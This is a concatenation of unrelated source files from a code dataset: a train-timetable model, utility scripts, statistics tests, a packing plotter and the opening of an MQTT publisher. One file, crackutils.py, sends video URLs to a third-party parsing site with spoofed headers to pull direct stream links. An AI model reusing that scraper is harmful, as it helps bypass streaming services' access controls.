of each city\n :return: \n \"\"\"\n accumulated_time = datetime.timedelta(hours=0, minutes=0)\n last_index = len(time_sequence) - 2\n for index, time in enumerate(time_sequence[:-1]):\n if index == last_index:\n accumulated_time = accumulated_time + duration[index]\n break\n departure_time = time_sequence[index + 1]\n arrival_time_ = arrival_time[index]\n\n if arrival_time_ <= departure_time:\n time_interval = duration[index] + departure_time - arrival_time_\n else:\n time_interval = duration[index] + departure_time - arrival_time_ + datetime.timedelta(hours=24)\n\n accumulated_time = accumulated_time + time_interval\n\n if accumulated_time.days > 0:\n hour_, minutes, _ = str(accumulated_time).split(',')[1].strip().split(':')\n new_hours = int(hour_) + 24 * accumulated_time.days\n\n return ':'.join([str(new_hours), str(int(minutes))])\n\n hour_, minutes, _ = str(accumulated_time).split(':')\n\n return ':'.join([str(int(hour_)), str(int(minutes))])\n\n def _shortest_time_span(self, time_table, route):\n \"\"\"\n This method is to calculate shortest journey length travelling from the first station of the journey to the last \n :param time_table: \n :return: shortest time\n \"\"\"\n result = []\n total_routes = len(time_table)\n duration = [self.journey_duration(station, route[i + 1]) for i, station in enumerate(route[:-1])]\n for first_departure_time, arrival_time in time_table[0].items():\n arrival_time_list = [arrival_time]\n available_departure_time = [first_departure_time]\n earliest_arrival_time = arrival_time\n for route_index, timetable in enumerate(time_table[1:], 1):\n\n 
earliest_departure_time = self._earliest_departure_time(earliest_arrival_time, timetable)\n earliest_arrival_time = timetable[earliest_departure_time]\n arrival_time_list.append(earliest_arrival_time)\n available_departure_time.append(earliest_departure_time)\n if route_index == total_routes - 1:\n available_departure_time.append(earliest_arrival_time)\n result.append({'time_sequence': available_departure_time,\n 'duration': duration, 'arrival_time': arrival_time_list})\n time_consumed = [self._time_span(i['time_sequence'], i['duration'], i['arrival_time']) for i in result]\n return min(time_consumed)\n\n def shortest_route(self, start_station, end_station):\n \"\"\"\n This method is to find all the paths from start_station to end_station, and corresponding timetable from which \n shortest journey is found\n :param start_station: str\n :param end_station: str\n :return: shortest path from start_station to end_station, duration of this path\n \"\"\"\n all_paths = self.all_valid_journey(start_station, end_station)\n journey_len = {}\n for route in all_paths:\n time_table = self._time_table_from_route(route)\n if not time_table:\n continue\n shortest_time = self._shortest_time_span(time_table, route)\n journey_len[''.join(route)] = shortest_time\n\n if journey_len:\n quickest_path = min(journey_len, key=journey_len.get)\n return quickest_path, journey_len[quickest_path]\n","repo_name":"arturogonzalezm/trainsimulator","sub_path":"trainsimulator/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73216148377","text":"import requests\nimport csv\nimport sys\nfrom datetime import datetime\nimport os\n\ncsv_path = sys.argv[1]\nimg_path = sys.argv[2]\n\ndt_time = datetime.today().strftime('%Y-%m-%d')\nos.mkdir(img_path + dt_time)\n\nwith open(csv_path,'r') as file:\n reader = csv.reader(file, delimiter=';')\n next(reader)\n \n for count, row in enumerate(reader):\n image_et = row[13]\n response_et = requests.get(image_et)\n file_et = open(img_path + dt_time + '\\\\' + str(count) +'_image_et.jpg', 'wb')\n file_et.write(response_et.content)\n file_et.close()\n \n \n image_cs = row[14]\n response_cs = requests.get(image_cs)\n file_cs = open(img_path + dt_time + '\\\\'+ str(count) +'_image_cs.jpg', 'wb')\n file_cs.write(response_cs.content)\n file_cs.close()","repo_name":"MaaYuu/Online_Arbitrage_project","sub_path":"online_arbitrage/image_download.py","file_name":"image_download.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40691712409","text":"def decode(string):\n\tstring = ''.join(ch for ch in string.lower() if ch.isalnum())\n\treturn_str = ''\n\tfor x in string:\n\t\tif x.isalpha():\n\t\t\t25 - ord('a') + 97\n\t\t\tchar = chr(25 - ord(x) + 97 + ord('a'))\n\t\t\treturn_str += char\n\t\telse:\n\t\t\treturn_str += x\n\treturn return_str\n\ndef encode(string): \n\tstring = decode(string)\n\tstr_list = []\n\twhile len(string) > 5:\n\t\tstr_list.append(string[:5])\n\t\tstring = string[5:]\n\tif string:\n\t\tstr_list.append(string)\n\treturn ' 
'.join(str_list)\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/atbash-cipher/f2e9f5db90f84382934cfdffade3f548.py","file_name":"f2e9f5db90f84382934cfdffade3f548.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"367227125","text":"import re\nfrom bs4 import BeautifulSoup\nfrom urllib import request, parse\n\n\nclass CrackUtils:\n\n @staticmethod\n def video_crack(item):\n get_url = 'http://www.wq114.org/x2/tong.php?url=%s' % item['video_url']\n get_movie_url = 'http://www.wq114.org/x2/api.php'\n head = {\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19',\n 'Referer': get_url\n }\n get_url_req = request.Request(url=get_url, headers=head)\n get_url_response = request.urlopen(get_url_req)\n get_url_html = get_url_response.read().decode('utf-8')\n bf = BeautifulSoup(get_url_html, 'lxml')\n a = str(bf.find_all('script'))\n pattern = re.compile(\"url : '(.+)',\", re.IGNORECASE)\n allPattern = pattern.findall(a)\n if len(allPattern) == 0:\n raise Exception\n url = allPattern[0]\n get_movie_data = {\n 'up': '0',\n 'url': '%s' % url,\n }\n get_movie_req = request.Request(url=get_movie_url, headers=head)\n get_movie_data = parse.urlencode(get_movie_data).encode('utf-8')\n get_movie_response = request.urlopen(get_movie_req, get_movie_data)\n get_movie_html = get_movie_response.read().decode('utf-8')\n respJson = eval(get_movie_html)\n item['h5_url'] = str(respJson['url']).replace(\"\\/\", \"/\")\n item = CrackUtils.resource_crack(item)\n return item\n\n @staticmethod\n def resource_crack(item):\n get_url = item['h5_url']\n if str(get_url).endswith(\".m3u8\") or str(get_url).endswith(\".mp4\"):\n item['resource_url'] = get_url\n return item\n head = {\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19',\n 'Referer': get_url\n }\n get_url_req = request.Request(url=get_url, headers=head)\n get_url_response = request.urlopen(get_url_req)\n get_url_html = get_url_response.read().decode('utf-8')\n bf = BeautifulSoup(get_url_html, 'lxml')\n a = str(bf.find_all('script'))\n pattern = re.compile(\"hls.loadSource\\('(.+)'\\)\", re.IGNORECASE)\n resourceAll = pattern.findall(a)\n if len(resourceAll) > 0:\n url = str(pattern.findall(a)[0]).replace(\"\\/\", \"/\")\n item['resource_url'] = url\n return item\n","repo_name":"hjcenry/VideoCrawer","sub_path":"video_url_crawler_demo/spiders/crackutils.py","file_name":"crackutils.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"23933779124","text":"\"\"\"Tests of equal correlation hypothesis\n\nThe module contains methods testing hypothesis of\ncorrelation equality\n\"\"\"\n\n\nimport numpy as np\nimport scipy.stats\nfrom .correlation_utils import \\\n pearsonr_mean, pearsonr_std\n\ndef ztest(\n first_rs, first_size,\n second_rs, second_size,\n correlation=\"spearman\",\n alternative=\"two-sided\"\n):\n \"\"\"Check the hypothesis that pearson correlations\n are equal\n\n Parameters\n ----------\n first_rs: numerical value or list\n A sequence (potentially with one element)\n of correlations.\n first_size: numerical value or list\n Sizes of samples that were used to compute\n \"first_rs\" correlation(s).\n second_rs: 
numerical value or list\n A sequence (potentially with one element)\n of correlations.\n second_size: numerical value or list\n Sizes of samples that were used to compute\n \"second_rs\" correlation(s).\n alternative: \"two-sided\" (default), \"less\", \"greater\"\n Computes the probability of the following events:\n \"two-sided\" |arctanh(x1) - arctanh(x2)| >\n |arctanh(first_rs) - arctanh(second_rs)|,\n \"less\" arctanh(x1) - arctanh(x2) <=\n arctanh(first_rs) - arctanh(second_rs) ,\n \"greater\" arctanh(x1) - arctanh(x2) >\n arctanh(first_rs) - arctanh(second_rs).\n \n Returns\n -------\n pair of numerical values or numpy.arrays respectively to the input\n Contains statistic and pvalue.\n \"\"\"\n\n if len(first_rs) != len(second_rs):\n return None\n result_len = len(first_rs)\n\n first_rs = np.array(first_rs)\n first_size = np.array(first_size)\n \n second_rs = np.array(second_rs)\n second_size = np.array(second_size)\n \n bound_indexes = (np.abs(first_rs + second_rs) == 2) | \\\n (first_rs == None) | (second_rs == None)\n bound_indexes = ~bound_indexes\n\n first_rs = first_rs[bound_indexes]\n second_rs = second_rs[bound_indexes]\n\n first_ss = pearsonr_std(first_rs, first_size)\n second_ss = pearsonr_std(second_rs, second_size)\n \n if (correlation==\"spearman\"):\n first_ss *= np.sqrt(1.5)\n second_ss *= np.sqrt(1.5)\n\n stat = np.arctanh(first_rs) - np.arctanh(second_rs)\n std = np.sqrt(first_ss**2 + second_ss**2)\n \n pvalue = None\n \n if (alternative == \"less\"):\n pvalue = scipy.stats.norm.cdf(stat, scale=std)\n elif (alternative == \"greater\"):\n pvalue = 1 - scipy.stats.norm.cdf(stat, scale=std)\n elif (alternative == \"two-sided\"):\n pvalue = 2 * scipy.stats.norm.cdf(-np.abs(stat), scale=std)\n\n stat_result = np.zeros(result_len, dtype=\"float32\")\n pvalue_result = np.zeros(result_len, dtype=\"float32\")\n \n stat_result[~bound_indexes] = None\n pvalue_result[~bound_indexes] = None\n \n stat_result[bound_indexes] = stat\n pvalue_result[bound_indexes] = pvalue\n\n return stat_result, pvalue_result\n","repo_name":"zhiyanov/DCoNA","sub_path":"dcona/core/correlations/correlation_tests.py","file_name":"correlation_tests.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"68"} +{"seq_id":"35777892096","text":"\ndef func(sp,weightdf,vehicle_path,plate):\n dflist = []\n # for jj in range(0,3):\n for jj in range(0,len(sp)):\n # match the indeces of filtered movements\n df = sp.loc[sp.index==jj]\n TravelTime = float(df['duration'])\n if TravelTime > 40:\n continue\n if TravelTime < 2:\n continue\n\n # split 'date' & 'start_time' & 'end_time' of (marginal.csv) file\n df['Dates'] = pd.to_datetime(df['first_time']).dt.date\n s = pd.to_datetime(df['last_time']).dt.date\n if df['Dates'].iloc[0]!=s.iloc[0]:\n continue\n df['HrMin_start'] = pd.to_datetime(df['first_time']).dt.strftime('%H:%M')\n df['HrMin_end'] = pd.to_datetime(df['last_time']).dt.strftime('%H:%M')\n\n # Open (matched_index.csv) file that matches the date of current sp trip\n str_date = str(df['Dates'].iloc[0])\n matchedroadID_file = [str(f) for f in os.listdir(vehicle_path) if \n re.match(rf'.*{re.escape(str_date)}.*_indexes', f)]\n \n # for some days there is no file. 
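# NOTE (editor): a self-contained, hedged sketch of the Fisher z-test logic used
# by `ztest` above: difference the arctanh-transformed correlations and scale by
# the combined standard error. Here the classic 1/sqrt(n-3) Fisher approximation
# stands in for the module's pearsonr_std; all sample values are assumed.

import numpy as np
import scipy.stats

r1, n1 = 0.62, 120
r2, n2 = 0.48, 150
stat = np.arctanh(r1) - np.arctanh(r2)
std = np.sqrt(1.0 / (n1 - 3) + 1.0 / (n2 - 3))
pvalue = 2 * scipy.stats.norm.cdf(-abs(stat), scale=std)  # two-sided
print(stat, pvalue)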
Ignore them\n if bool(matchedroadID_file):\n full_path_ID = vehicle_path+'\\\\'+matchedroadID_file[0]\n df_id = pd.read_csv(full_path_ID)\n else:\n continue\n\n # Open (edges_all.csv) file that matches the date of current sp trip\n matchedroadall_file = [str(f) for f in os.listdir(vehicle_path) if \n re.match(rf'.*{re.escape(str_date)}.*_all', f)]\n full_path_all = vehicle_path+'\\\\'+matchedroadall_file[0]\n df_all = pd.read_csv(full_path_all)\n df_all['HrMin'] = pd.to_datetime(df_all['datetime']).dt.strftime('%H:%M')\n first_index = df_all[df_all['HrMin'] == df['HrMin_start'].iloc[0]].index[0]\n last_in = df_all[df_all['HrMin'] == df['HrMin_end'].iloc[0]].index\n last_index = last_in[-1]\n df_specific = df_all[(df_all.index >= first_index) & (df_all.index <= last_index)]\n EdgeIndex_unique1 = df_specific['EdgeIndex'].unique()\n df_matched = getsp.find_chunk(df_specific, df_id, EdgeIndex_unique1)\n\n if df_matched is None:\n continue\n \n EdgeIndex_unique = df_matched['Index'].unique()\n if len(EdgeIndex_unique) < 2:\n continue\n EdgeIndex_unique = df_matched['Index'].unique()\n new_df = t.calc_time(df_specific)\n y = new_df['TimeDiff0'].iloc[:].sum()\n #_____________________weight_df_____________________#\n df_specific['hour'] = pd.to_datetime(df_specific['datetime']).dt.strftime('%H')\n hr = int(df_specific['hour'].iloc[0]) \n time_list = []\n for ind, row in weightdf.iterrows():\n traversetime = row['weight'][hr]\n time_list.append(traversetime)\n # define the traversal time of an edge at a specific time as weight (instead of velocity weight)\n weightdf['weight(s)'] = time_list\n \n # _____________________network_______________________#\n # Extract required data from testing trip: duration, source_node, target_node, hour\n for i in EdgeIndex_unique:\n if i in weightdf['EdgeID'].values:\n start = i\n break\n if EdgeIndex_unique[-2] not in weightdf['EdgeID'].values:\n a = [i in weightdf['EdgeID'].values for i in EdgeIndex_unique]\n output = [idx for idx, element in enumerate(a) if element==False][0]\n end = EdgeIndex_unique[output-1]\n else:\n end = EdgeIndex_unique[-2]\n source = weightdf.loc[weightdf['EdgeID'] == start, 'from_node'].iloc[0]\n try:\n target = weightdf.loc[weightdf['EdgeID'] == end, 'to_node'].iloc[0]\n except (ValueError,IndexError):\n continue\n\n output = net.mynetwork(source,target,weightdf)\n\n if output is None:\n y_dijk1 = np.nan\n continue\n else:\n y_dijk1 = output[0]\n path_dijk = output[1]\n dijk_dist = output[2]\n\n # ______________________similarity_________________________#\n node_list1=[]\n for i in EdgeIndex_unique:\n try:\n df = weightdf.loc[weightdf['EdgeID']==i]\n node_list1.extend([df['from_node'].iloc[0],df['to_node'].iloc[0]])\n except (TypeError, IndexError):\n continue\n node_list_unique1 = list(set(node_list1))\n similarity = sum(i in node_list_unique1 for i in path_dijk)/len(node_list_unique1)\n sim = sum(i in node_list_unique1 for i in path_dijk)/len(path_dijk)\n #************** Total route travel time ******************\n sumtime_traversal = new_df['TimeDiff0'].iloc[:].sum() \n #**********************************************\n df_specific['hour'] = pd.to_datetime(df_specific['datetime']).dt.strftime('%H')\n #************** hour of day *************\n hr = int(df_specific['hour'].iloc[0]) # hour of day\n #***************** Total route distance ********************\n distance = df_matched['Distance'].sum()\n #**********************************************************\n\n tripdf = pd.DataFrame([{'travel time':sumtime_traversal,'hour of day':hr,\n 
'distance': distance, 'est_dist': dijk_dist, 'similarity':similarity, 'similarity_dijk':sim}])\n\n\n        dflist.append(tripdf)\n    all_tripdf = pd.concat(dflist, axis=0, ignore_index=True)\n    \n    return all_tripdf\n\n\n\n\n# Module-level imports used by the functions above.\nimport re\nimport os\nimport pandas as pd\nimport numpy as np\nimport network as net\nimport SPpath_finder as getsp\nimport speed_file as t\n\n\n","repo_name":"ShimaRahmani/Seneca-Project","sub_path":"NN/travelfile_dijk.py","file_name":"travelfile_dijk.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
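The similarity figures computed at the end of travelfile_dijk.py above are overlap ratios between the nodes of the driven route and the nodes of the Dijkstra path. A minimal stand-alone sketch of the idea (names are mine; unlike the loop above, this variant dedupes both node lists with sets):

```python
def overlap_ratios(route_nodes, dijkstra_nodes):
    """Return (share of unique route nodes on the path,
               share of unique path nodes seen on the route)."""
    route_unique = set(route_nodes)
    path_unique = set(dijkstra_nodes)
    hits = route_unique & path_unique
    return len(hits) / len(route_unique), len(hits) / len(path_unique)

# Tiny worked example: nodes 1, 2 and 8 are shared.
print(overlap_ratios([1, 2, 2, 3, 5, 8], [1, 2, 4, 8]))  # (0.6, 0.75)
```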
+{"seq_id":"40960653226","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 18 20:49:47 2020\n\n@author: elliotgross\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nimport math\n\n\ndef undo_levels(df):\n    '''\n    This method strips the multi-index and returns a dataframe with reset indices.\n\n    Parameters\n    ----------\n    df : pd.DataFrame\n        A dataframe of all the votes.\n\n    Returns\n    -------\n    : pd.DataFrame\n        A dataframe of all the votes, with reset indices.\n\n    '''\n    \n    return df.reset_index().drop(['index','level_0'], axis=1, errors='ignore')\n\ndef eliminate_candidate(df, candidate):\n    '''\n    This method removes all instances of the given candidate and shifts \n    the next choice vote over. \n\n    Parameters\n    ----------\n    df : pd.DataFrame\n        A dataframe of all the votes.\n    candidate : String\n        The candidate to be removed.\n\n    Returns\n    -------\n    df : pd.DataFrame\n        A dataframe with the given candidate removed\n\n    '''\n    df = undo_levels(df)\n    \n\n    for i,column in enumerate(df.columns.to_list()[:-1]):\n        candidate_to_remove_index = df[df[column] == candidate].index\n        \n        #Shift from current column to final choice\n        df.loc[candidate_to_remove_index,df.columns.to_list()[i:-1]] = df.loc[candidate_to_remove_index,\n                                                                              df.columns.to_list()[:-1]].shift(-1,axis=1)\n        \n    # Re-Add Levels\n    df = df.set_index(df.columns.to_list()[:-1]).sort_index()\n    \n    return df\n    \ndef handle_winner(df, threshold, total_winners):\n    '''\n    This method finds the winner, calculates the new weight, redistributes the votes using the new weight,\n    and then removes the winner. Afterwards, the winner is appended to total_winners. The updated df\n    and total_winners are returned.\n\n    Parameters\n    ----------\n    df : pd.DataFrame\n        A dataframe of all the votes.\n    threshold : float\n        The minimum amount of votes needed to secure a win.\n    total_winners : list\n        A list of the total winners.\n\n    Returns\n    -------\n    df : pd.DataFrame\n        A dataframe of all the votes, with the votes redistributed and the winner removed.\n    total_winners : list\n        A list of the winners of the election.\n\n    '''\n    \n    top_winner_row = df.reset_index().groupby(['Choice 1']).sum().sort_values(['Weight'], ascending=False).iloc[0,:]\n    \n    winner_name, winner_votes = top_winner_row.name, top_winner_row['Weight']\n\n    if winner_votes > threshold:\n        new_weight = (winner_votes-threshold)/winner_votes\n        \n        df = undo_levels(df)\n        \n        #Redistribute Vote\n        winner_rows_index = df[df['Choice 1'] == winner_name].index\n        df.loc[winner_rows_index,'Weight'] *= new_weight\n        \n        #Get Rid of Winner\n        df = eliminate_candidate(df, winner_name)\n\n        total_winners.append(winner_name)\n    \n    return df, total_winners\n\ndef handle_loser(df):\n    '''\n    This method first calculates the loser and then removes them from the dataframe\n\n    Parameters\n    ----------\n    df : pd.DataFrame\n        A dataframe of all the votes.\n\n    Returns\n    -------\n    df : pd.DataFrame\n        A dataframe of all the votes with the loser removed.\n\n    '''\n    \n    loser_name = df.reset_index().groupby(['Choice 1']).sum().sort_values(['Weight']).iloc[0,:].name\n    df = eliminate_candidate(df, loser_name)\n    \n    return df\n\n    \ndef check_for_winner(df, threshold):\n    '''\n    This method finds the current leader and returns whether that leader has\n    more votes than the threshold.\n\n    Parameters\n    ----------\n    df : pd.DataFrame\n        A dataframe of all the votes.\n    threshold : float\n        The minimum amount of votes needed to secure a win.\n\n    Returns\n    -------\n    : bool\n        True if the leading candidate has more votes than the threshold, False otherwise.\n\n    '''\n    \n    top_winner_row = df.reset_index().groupby(['Choice 1']).sum().sort_values(['Weight'], ascending=False).iloc[0,:]\n    winner_votes = top_winner_row['Weight']\n    \n    return winner_votes > threshold\n    \n    \ndef prepare_data(csv_filename, candidates):\n    '''\n    This method takes in a csv filename and the candidates and returns a multi-indexed,\n    prepared dataframe.\n\n    Parameters\n    ----------\n    csv_filename : String\n        A filepath to the votes data.\n    candidates : list\n        A list of all the candidates.\n\n    Returns\n    -------\n    df : pd.DataFrame\n        A multi-indexed, prepared, dataframe.\n\n    '''\n    \n    #Create Column Names\n    column_names = [\"Choice %s\" % (i+1) for i in range(len(candidates))]\n    candidate_scores = dict([(candidate, 1) for candidate in candidates])\n    \n    handle_invalid_votes(csv_filename)\n    \n    #Read CSV\n    df = pd.read_csv(csv_filename, names=column_names)\n    df = df.reset_index(drop=True)\n    \n    #Set the Weight\n    df[\"Weight\"] = 1\n    \n    #Convert and return a multi-index dataframe\n    return df.set_index(df.columns.to_list()[:-1]).sort_index()\n\n    \ndef handle_invalid_votes(csv_filename):\n    '''\n    This method pushes all the empty votes to the end and removes all the empty ballots.\n\n    Parameters\n    ----------\n    csv_filename : String\n        A string of the name of the csv file.\n\n    '''\n    with open(csv_filename) as file:\n        file_content = file.read()\n    file_rows = file_content.split('\\n')\n    \n    cleaned_rows = []\n    for row in file_rows:\n        choices = row.split(',')\n        \n        # Keep filled choices in order and push empty choices to the end.\n        filled = [choice for choice in choices if choice != '']\n        choices = filled + [''] * (len(choices) - len(filled))\n        \n        if filled:\n            cleaned_rows.append(','.join(choices))\n    \n    with open(csv_filename, 'w') as file:\n        file.write('\\n'.join(cleaned_rows))\n    \ndef remove_invalid_votes(df):\n    '''\n    This method removes all the invalid votes in the first choice column.\n\n    Parameters\n    ----------\n    df : pd.DataFrame\n        A dataframe of all the votes.\n\n    Returns\n    -------\n    df : pd.DataFrame\n        A dataframe with invalid votes removed.\n\n    '''\n    df = undo_levels(df)\n    # NaN != NaN, so this keeps only rows with a valid first choice.\n    df = df.drop(df[df['Choice 1'] != df['Choice 1']].index)\n    \n    return df\n\ndef run_rounds(df, num_of_winners, total_winners):\n    '''\n    This method returns the total winners of the election.\n    \n    This method first checks if there are enough total winners. If there are, then the winners \n    are returned. If there aren't, the invalid votes are removed and then it checks for a winner. If\n    there is a winner, then the handle_winner(df, threshold, total_winners) method is called and then \n    run_rounds(df, num_of_winners, total_winners) is called again. If there is no winner,\n    then the handle_loser(df) method is called, followed by a recursive \n    run_rounds(df, num_of_winners, total_winners).\n    \n    Parameters\n    ----------\n    df : pd.DataFrame\n        A dataframe of all the votes.\n    num_of_winners : int\n        The desired amount of winners.\n    total_winners : list\n        A list of the winners so far.\n\n    Returns\n    -------\n    total_winners : list\n        A list of the total winners.\n\n    '''\n    \n    df = remove_invalid_votes(df)\n\n    if len(total_winners) < num_of_winners:\n        \n        total_votes = df.shape[0]\n        threshold = math.floor(total_votes / (num_of_winners+1) + 1)\n        \n        if check_for_winner(df, threshold):\n            df, total_winners = handle_winner(df, threshold, total_winners)\n            return run_rounds(df, num_of_winners, total_winners)\n        \n        else:\n            df = handle_loser(df)\n            return run_rounds(df, num_of_winners, total_winners)\n    \n    return total_winners\n    \n    \n    \ndef main(csv_filename, candidates, num_of_winners):\n    '''\n    This method first prepares the data, then runs the run_rounds(df, num_of_winners, total_winners)\n    method and stores the result. The total_winners list is then returned.\n\n    Parameters\n    ----------\n    csv_filename : String\n        A filepath to the votes data.\n    candidates : list\n        A list of all the candidates.\n    num_of_winners : int\n        The desired amount of winners.\n\n    Returns\n    -------\n    total_winners : list\n        The winners of the election.\n\n    '''\n    df = prepare_data(csv_filename, candidates)\n    \n    total_winners = run_rounds(df, num_of_winners, [])\n    \n    return total_winners\n    ","repo_name":"Elliot-Gross/Election-System-Project","sub_path":"sample/Election_Project.py","file_name":"Election_Project.py","file_ext":"py","file_size_in_byte":8571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
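run_rounds above recomputes the win threshold each round as the Droop quota, and handle_winner then carries each winning ballot forward at a reduced weight. A small stand-alone sketch of the two formulas (function names are mine):

```python
import math

def droop_quota(total_votes, seats):
    # Smallest whole number of votes that only `seats` candidates can reach.
    return math.floor(total_votes / (seats + 1) + 1)

def surplus_weight(winner_votes, quota):
    # Fraction of each winning ballot that transfers to its next choice.
    return (winner_votes - quota) / winner_votes

quota = droop_quota(total_votes=100, seats=2)  # -> 34
print(quota, surplus_weight(50, quota))        # 34 0.32
```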
 +{"seq_id":"41526354422","text":"import matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport numpy as np\n\n\nclass PlotterStrip:\n    _color_list = list(mcolors.CSS4_COLORS.values())\n\n    def __init__(self):\n        np.random.seed(0)\n        plt.axes()\n\n        plt.xlabel('Width')\n        plt.ylabel('Height')\n\n    def plot_individual_with_rotation(self, individual, heights, widths, max_width, title=\"Strip Packaging Problem - With Rotations\"):\n        # Plot Variables\n        plt.title(title)\n        ancho_anterior = 0\n        # Index rectangle variables\n        i = 0\n        ancho_acum = 0\n        altura_max = 0\n        altura_total = 0\n        ancho_actual = 0\n\n        for rectangulo in individual[0]:\n            rectangulo = int(rectangulo)\n\n            # Update Plot position\n            ancho_anterior += ancho_actual\n\n            # Check the rectangle's orientation (0 = as given, 1 = rotated)\n            if individual[1][i] == 0:\n                ancho_actual = widths[rectangulo]\n                altura_actual = heights[rectangulo]\n            else:\n                ancho_actual = heights[rectangulo]\n                altura_actual = widths[rectangulo]\n\n            if ancho_actual + ancho_acum <= max_width:\n                ancho_acum += ancho_actual\n                if altura_actual > altura_max:\n                    altura_max = altura_actual\n            else:\n                altura_total += altura_max\n                ancho_acum = ancho_actual\n                altura_max = altura_actual\n\n                # Update Plot position\n                ancho_anterior = 0\n            i += 1\n\n            # Draw rectangle\n            plt.axis('scaled')\n            fillColor = self._random_color()\n            rectangle_to_draw = plt.Rectangle((ancho_anterior, altura_total), ancho_actual, altura_actual,\n                                              fc=fillColor, ec='k')\n            plt.gca().add_patch(rectangle_to_draw)\n\n        altura_total += altura_max\n        plt.show()  # render once, after every rectangle has been added\n        return altura_total\n\n    def plot_individual_with_no_rotation(self, individual, heights, widths, max_width,\n                                         title=\"Strip Packaging Problem - No rotations\"):\n        # Plot variables\n        plt.title(title)\n        ancho_anterior = 0\n        ancho_actual = 0\n        altura_actual = 0\n\n        # Variables to index rectangles\n        ancho_acum = 0\n        altura_max = 0\n        altura_total = 0\n\n        for rectangle in individual:\n            rectangle = int(rectangle)\n\n            # Update Plot position\n            ancho_anterior += ancho_actual\n            ancho_actual = widths[rectangle]\n\n            # Update heights and widths\n            if widths[rectangle] + ancho_acum <= max_width:\n                ancho_acum += widths[rectangle]\n                if heights[rectangle] > altura_max:\n                    altura_max = heights[rectangle]\n            else:\n                altura_total += altura_max\n                ancho_acum = widths[rectangle]\n                altura_max = heights[rectangle]\n\n                # Update Plot position\n                altura_actual = altura_total\n                ancho_anterior = 0\n\n            # Draw rectangle\n            plt.axis('scaled')\n            patch = plt.Rectangle((ancho_anterior, altura_actual), widths[rectangle], heights[rectangle],\n                                  fc=self._random_color(), ec='k')\n            plt.gca().add_patch(patch)\n\n        plt.show()\n\n        return\n\n    # Returns a random color from _color_list\n    def _random_color(self):\n        fill_color_index = np.random.randint(0, len(self._color_list))\n        return 
self._color_list[fill_color_index]\n","repo_name":"meganmaguire/SPP-GA","sub_path":"Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10512731145","text":"\ndef read_in_depths(file_name):\n with open(file_name) as file:\n lines = file.readlines()\n lines = [int(line.rstrip()) for line in lines]\n return lines\n\ndef count_increases(depths):\n increase_count = 0\n\n for i in range(1,len(depths)):\n increase_count = increase_count + 1 if depths[i] > depths[i - 1] else increase_count\n\n return increase_count\n\ndef apply_window_count(depths, window):\n summed_depths = []\n\n for i in range(0, len(depths) - (window-1)):\n sum = 0\n for j in range(i, i + window):\n sum = sum + depths[j]\n summed_depths.append(sum)\n \n return summed_depths\n\n#A: 1766\n#H: 1581\ndef day_one_part_one():\n depths = read_in_depths(\"data/day_one.txt\")\n return count_increases(depths)\n\n#A: 1797\n#H: 1618\ndef day_one_part_two():\n depths = read_in_depths(\"data/day_one.txt\")\n window_count_depths = apply_window_count(depths, 3)\n return count_increases(window_count_depths)\n\nprint(day_one_part_one())\nprint(day_one_part_two())\n","repo_name":"aliwen-soft/AdventOfCode2021","sub_path":"src/day1_depth_counter.py","file_name":"day1_depth_counter.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24406018996","text":"#! /usr/bin/env python3\n\n# based on https://gist.github.com/Sennevds/1ff538ba80978810019af3d5da92118f\nfrom subprocess import check_output\nfrom re import findall\nimport psutil\nimport sys\nimport os\nimport threading, time, signal\nfrom datetime import timedelta\nimport datetime as dt\nimport paho.mqtt.client as mqtt\nimport pytz\nimport json\nfrom pytz import timezone\nimport logging\nfrom systemd.journal import JournalHandler\n\nlog = logging.getLogger(\"mqtt-publisher\")\nlog.addHandler(JournalHandler())\nlog.setLevel(logging.INFO)\n\n# Config\nbroker_url = os.getenv('MQTT_HOST') #MQTT server IP\ndeviceName = os.getenv('DEVICE_NAME') #Name off your PI\n\nDEFAULT_TIME_ZONE = timezone(os.getenv('TZ','Europe/Moscow'))#Local Time zone\nbroker_port = int(os.getenv('MQTT_PORT', 1883)) #MQTT server port\nbroker_user = os.getenv('MQTT_USER', '')\nbroker_pass = os.getenv('MQTT_PASS' ,'')\ntrackedMounts = os.getenv('TRACKED_MOUNTS', 'root:/')\n\nWAIT_TIME_SECONDS = int(os.getenv(\"SLEEP_TIME\", 60))\n\nPROCFS_PATH = os.getenv(\"PROC_PATH\", \"/proc\")\nMODEL_PATH = os.getenv(\"MODEL_PATH\", \"/sys/firmware/devicetree/base/model\")\nVCGENCMD = os.getenv(\"VCGENCMD\", \"vcgencmd\")\n\npsutil.PROCFS_PATH = PROCFS_PATH\n\nUTC = pytz.utc\nSYSFILE = '/sys/devices/platform/soc/soc:firmware/get_throttled'\n\nmqtt.Client.connected_flag=False\n\ndef on_connect(client, userdata, flags, rc):\n 